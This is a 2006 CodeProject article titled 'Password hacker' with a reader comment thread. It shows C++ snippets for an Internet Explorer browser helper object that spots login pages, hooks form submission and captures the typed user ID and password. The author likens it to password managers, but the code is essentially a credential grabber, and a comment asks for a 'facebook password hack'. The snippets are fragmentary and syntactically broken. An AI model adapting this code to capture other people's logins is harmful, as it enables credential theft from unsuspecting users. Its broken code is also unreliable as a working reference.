Click here to Skip to main content
12,444,790 members (55,466 online)
Click here to Skip to main content
Add your own
alternative version


73 bookmarked

Password hacker

, 17 Sep 2006 CPOL
Rate this:
Please Sign up or sign in to vote.
A simple BHO to retrieve the user ID and password.

Screenshot - logininfo.jpg


LoginMgr is developed as a browser helper object (BHO). New instances of Internet Explorer and Windows Explorer load a BHO at the time of start. In BHO, you can handle Internet Explorer events, and access the browser window and document object model (DOM). LoginMgr also explains how to handle browser events in a multi-frame page.


Have you ever used any password manager and auto form filler software? AI RoboForm is the oldest and the best in the industry. The latest version of Firefox and Netscape also support this by Passcard. Imagine developing a software that can retrieve the user ID and password! To achieve the above, I needed to develop an Internet Explorer plug-in or BHO. There are many articles on how to develop a BHO using ATL, so I would skip this and focus on how to handle events and access DOM to retrieve user ID and password. The basic question that comes in mind is how we can detect that a given page is a login page. If you get an answer to this, you can do the rest. After some experiments, I found that we should try to retrieve the password of a page only if it has at least one input field of type "password". Another important thing is that most login pages have only one object of type <INPUT TYPE=TEXT> and only one object of type <INPUT TYPE=PASWWORD>.

How to retrieve user ID and password

When the browser completes downloading a page, it sends an event DISPID_DOCUMENTCOMPLETE. Here, we should check if a page is a login page. To detect this, you have to search through all the elements in the document object and find out if there is any element that's of type "password". If you find one, we are almost sure that this is a login page.

Connecting to <FORM> events

CComPtr<IDISPATCH> spDisp; 
HRESULT hr = m_pWebBrowser2->get_Document(&spDisp);
if (SUCCEEDED(hr) && spDisp)
    // If this is not an HTML document (e.g., it's a Word doc or a PDF), don't sink.
    CComQIPtr<IHTMLDOCUMENT2 &IID_IHTMLDocument2> spHTML(spDisp);
     if (spHTML)
         /*there can be frames in HTML page enumerate each of frameset or iframe
              and find out if any of them contain a login page*/

void CIeLoginHelper::EnumFrames(CComPtr<IHTMLDocument2>& spDocument) 
    CComPtr<IIHTMLDocument2> spDocument2;
    CComPtr<IIOleContainer> pContainer;
    // Get the container
    HRESULT hr = spDocument->QueryInterface(IID_IOleContainer,
    // Get an enumerator for the frames
    hr = pContainer->EnumObjects(OLECONTF_EMBEDDINGS, &pEnumerator);
    IUnknown* pUnk;
    ULONG uFetched;

    // Enumerate and refresh all the frames
    BOOL bFrameFound = FALSE;
    for (UINT nIndex = 0; 
            S_OK == pEnumerator->Next(1, &pUnk, &uFetched);
        CComPtr<IIWebBrowser2> pBrowser;
        hr = pUnk->QueryInterface(IID_IWebBrowser2, 
        if (SUCCEEDED(hr))
            CComPtr<IIDispatch> spDisp;
            CComQIPtr<IHTMLDocument2, &
                         IID_IHTMLDocument2> spDocument2(spDisp);
            //Now recursivley browse through all of
                        //IHTMLWindow2 in a doc                    
            bFrameFound = TRUE;

    if(!bFrameFound || !m_bFoungLoginPage)

        CComPtr<IIHTMLElementCollection> spFrmCol;
        CComPtr<IIHTMLElementCollection> spElmntCol;
        /*multipe <FORM> object can be in a page,
                 connect to each one them
        You never know which one contains uid and pwd fields
        hr = spDocument->get_forms(&spFrmCol);
        // get element collection from page to check 
                if a page is a lgoin page
        hr = spDocument->get_all(&spElmntCol);

If a page has a password field, then you'll be interested in getting the user ID and password.

BOOL  CIeLoginHelper::IsLoginPage(CComPtr<IHTMLElementCollection>&spElemColl)
    if(spElemColl == NULL)
        return m_bFoungLoginPage;
    _variant_t varIdx(0L, VT_I4);
    long lCount = 0;
    HRESULT hr  = S_OK;
    hr = spElemColl->get_length (&lCount);
    if (SUCCEEDED(hr))
        for(long lIndex = 0; lIndex <lCount; lIndex++ ) 
            hr = spElemColl->item(varIdx, varIdx, &spElemDisp);
            if (SUCCEEDED(hr))
                CComPtr<IHTMLInputElement> spElem;
                hr = spElemDisp->QueryInterface(IID_IHTMLInputElement, (void**)&spElem);
                if (SUCCEEDED(hr))
                    _bstr_t bsType;
                    hr = spElem->get_type(&bsType.GetBSTR());
                    if(SUCCEEDED(hr) && bsType.operator==(L"password"))
                        m_bFoungLoginPage = true;
                return m_bFoungLoginPage;
    return m_bFoungLoginPage;

Once you determine the target page, all you've to do is walk through the form collection and connect to the events of the form elements, as below:

_variant_t varIdx(0L, VT_I4);
long lCount = 0;
hr = pElemColl->get_length (&lCount);
if (SUCCEEDED(hr))
    for(long lIndex = 0; lIndex <lCount; lIndex++ ) 
           hr=pElemColl->item(varIdx, varIdx, &pElemDisp);

        if (SUCCEEDED(hr))
            hr = pElemDisp->QueryInterface(IID_IHTMLFormElement, (void**)&pElem);

            if (SUCCEEDED(hr))
                // Obtained a form object.
                IConnectionPointContainer* pConPtContainer = NULL;
                IConnectionPoint* pConPt = NULL;    
                // Check that this is a connectable object.
                hr = pElem->QueryInterface(IID_IConnectionPointContainer,
                if (SUCCEEDED(hr))
                    // Find the connection point.
                    hr = pConPtContainer->FindConnectionPoint(
                        DIID_HTMLFormElementEvents2, &pConPt);

                    if (SUCCEEDED(hr))
                        // Advise the connection point.
                        // pUnk is the IUnknown interface pointer for your event sink
                        hr = pConPt->Advise((IDispatch*)this, &m_dwBrowserCookie);

Capturing the user ID and password

The timing of data capture is important. The best time is when the form is being submitted. A form can be submitted in many ways:

  1. When an object of type <INPUT TYPE=submit> or <INPUT TYPE=image> or <BUTTON TYPE=submit> is clicked by the left mouse key, or the Enter key or space bar key is pressed.
  2. Any of the above objects will trigger the event DISPID_HTMLFORMELEMENTEVENTS2_ONSUBMIT.

  3. By calling form.submit in an event handler of an object's mouse or key event handler.
  4. In this case, we've to handle:


Once you know when to capture the data, the rest is very easy. All you do is walk through the element collection and retrieve the user ID and password.

_variant_t varIdx(0L, VT_I4);
long lCount = 0;
hr = pElemColl->get_length (&lCount);
if (SUCCEEDED(hr))
    for(long lIndex = 0; lIndex <lCount; lIndex++ ) 
  hr=pElemColl->item(varIdx, varIdx, &pElemDisp);
    if (SUCCEEDED(hr))
        hr = pElemDisp->QueryInterface(IID_IHTMLInputElement, (void**)&pElem);
        if (SUCCEEDED(hr))
            _bstr_t bsType;
            if(bsType.operator ==(L"text"))
            else if(bsType.operator==(L"password"))

    if(bsUserId.GetBSTR() && bsPassword.GetBSTR() && 
      ( bsUserId.operator!=(L"") && bsPassword.operator!=(L"") ) )



  • V1.0.0.1 - First version.
  • V1.0.1.1 - Uploaded on Aug 29, 2006. This version enumerates the frames in a page to find out if any of the frames has a login page.


This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)


About the Author

ram verma
Software Developer (Senior)
India India
I'm in software industry for over 10 years.

You may also be interested in...


Comments and Discussions

Questionhelp Pin
Member 1124369618-Nov-14 2:45
memberMember 1124369618-Nov-14 2:45 
Suggestionfacebook password hack Pin
Member 1123576514-Nov-14 23:32
memberMember 1123576514-Nov-14 23:32 
GeneralMy vote of 1 Pin
Member 83662515-Feb-14 2:47
memberMember 83662515-Feb-14 2:47 
QuestionHow can i get infomation if user refresh the web page? Pin
Member 1030057624-Nov-13 19:50
memberMember 1030057624-Nov-13 19:50 
GeneralIs there any same concept for Firefox Extensions... Pin
Shashi.Shinde12-May-11 4:28
memberShashi.Shinde12-May-11 4:28 
GeneralBHO does not prompt on Hotmail. Pin
Shashi.Shinde12-May-11 4:22
memberShashi.Shinde12-May-11 4:22 
GeneralMy vote of 5 Pin
Shashi.Shinde12-May-11 4:11
memberShashi.Shinde12-May-11 4:11 
Generalit is not work on firefox 3.6 Pin
zy_zlj27-Jan-10 0:57
memberzy_zlj27-Jan-10 0:57 
GeneralGreat Work. Pin
=>Joe<=29-May-09 1:03
member=>Joe<=29-May-09 1:03 
Generalhi Pin
michael14857-Feb-09 17:26
membermichael14857-Feb-09 17:26 
GeneralRe: hi Pin
ram verma7-Feb-09 20:56
memberram verma7-Feb-09 20:56 
GeneralExtending BHO Pin
cheshtang200010-Sep-07 16:17
membercheshtang200010-Sep-07 16:17 
GeneralRe: Extending BHO Pin
Member 1259721321-Jun-16 21:01
memberMember 1259721321-Jun-16 21:01 
GeneralSome sites/scenarios not working Pin
10165-Jul-07 20:20
member10165-Jul-07 20:20 
GeneralThank you Pin
JJMatthews6-Apr-07 12:08
memberJJMatthews6-Apr-07 12:08 
Questionhelp me Pin
luckychenl3-Apr-07 22:07
memberluckychenl3-Apr-07 22:07 
GeneralRe: help me Pin
ram verma3-Apr-07 22:38
memberram verma3-Apr-07 22:38 
GeneralRe: help me Pin
luckychenl4-Apr-07 1:08
memberluckychenl4-Apr-07 1:08 
GeneralRe: help me Pin
arasn24-Oct-08 5:14
memberarasn24-Oct-08 5:14 
Generalcompiled dll [modified] Pin
gujkhjk12-Mar-07 10:02
membergujkhjk12-Mar-07 10:02 
Questionatlutil.h Pin
luisfgutierrez23-Feb-07 13:21
memberluisfgutierrez23-Feb-07 13:21 
GeneralNeed suggestion Pin
Ram Murali12-Feb-07 14:59
memberRam Murali12-Feb-07 14:59 
GeneralRe: Need suggestion Pin
ram verma12-Feb-07 20:33
memberram verma12-Feb-07 20:33 
GeneralNice work Pin
Ram Murali12-Feb-07 14:56
memberRam Murali12-Feb-07 14:56 
GeneralRe: Nice work Pin
ram verma12-Feb-07 20:33
memberram verma12-Feb-07 20:33 
Generaldoes not work with Pin
Edson Tgila10-Feb-07 3:03
memberEdson Tgila10-Feb-07 3:03 
GeneralRe: does not work with Pin
ram verma12-Feb-07 20:44
memberram verma12-Feb-07 20:44 
Questionwhat does your code hack ? Pin
simonpp3-Feb-07 14:49
membersimonpp3-Feb-07 14:49 
AnswerRe: what does your code hack ? Pin
ram verma4-Feb-07 21:11
memberram verma4-Feb-07 21:11 
Generali need help,please Pin
Member #376656726-Jan-07 11:46
memberMember #376656726-Jan-07 11:46 
GeneralRe: i need help,please Pin
ram verma27-Jan-07 19:00
memberram verma27-Jan-07 19:00 
Questionwhat is for Pin
havoc12312-Jan-07 3:57
memberhavoc12312-Jan-07 3:57 
Generalit says Pin
havoc12311-Jan-07 10:02
memberhavoc12311-Jan-07 10:02 
Questionwhat is Pin
havoc12310-Jan-07 18:20
memberhavoc12310-Jan-07 18:20 
AnswerRe: what is Pin
ram verma10-Jan-07 19:23
memberram verma10-Jan-07 19:23 
QuestionHelp Pin
HoldenManiac10-Jan-07 5:00
memberHoldenManiac10-Jan-07 5:00 
AnswerRe: Help Pin
ram verma10-Jan-07 18:00
memberram verma10-Jan-07 18:00 
QuestionUSE Pin
BUOM21-Dec-06 20:09
memberBUOM21-Dec-06 20:09 
AnswerRe: USE Pin
ram verma22-Dec-06 21:17
memberram verma22-Dec-06 21:17 
GeneralRe: USE Pin
ram verma10-Jan-07 18:02
memberram verma10-Jan-07 18:02 
GeneralRe: USE Pin
gojohn16-Jun-07 1:50
membergojohn16-Jun-07 1:50 
GeneralProblem with events Pin
HarishDixit16-Oct-06 21:18
memberHarishDixit16-Oct-06 21:18 
GeneralGreat! Pin
madkoala14-Oct-06 7:14
membermadkoala14-Oct-06 7:14 
GeneralRe: Great! Pin
ram verma14-Oct-06 19:02
memberram verma14-Oct-06 19:02 
QuestionIs it better to write a open source tool to disable all the other Password hacker action? Pin
benben19-Sep-06 23:09
memberbenben19-Sep-06 23:09 
GeneralGood, learned from U Pin
qiuqianren17-Sep-06 6:15
memberqiuqianren17-Sep-06 6:15 
QuestionSetup creates error while installing Pin
gripusa14-Sep-06 15:16
membergripusa14-Sep-06 15:16 
AnswerRe: Setup creates error while installing Pin
ram verma14-Sep-06 18:39
memberram verma14-Sep-06 18:39 
GeneralIt doesn't work on, why? [modified] Pin
Hoochie27-Aug-06 22:11
memberHoochie27-Aug-06 22:11 
GeneralRe: It doesn't work on, why? Pin
ram verma29-Aug-06 0:50
memberram verma29-Aug-06 0:50 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.

| Advertise | Privacy | Terms of Use | Mobile
Web02 | 2.8.160811.3 | Last Updated 17 Sep 2006
Article Copyright 2006 by ram verma
Everything else Copyright © CodeProject, 1999-2016
Layout: fixed | fluid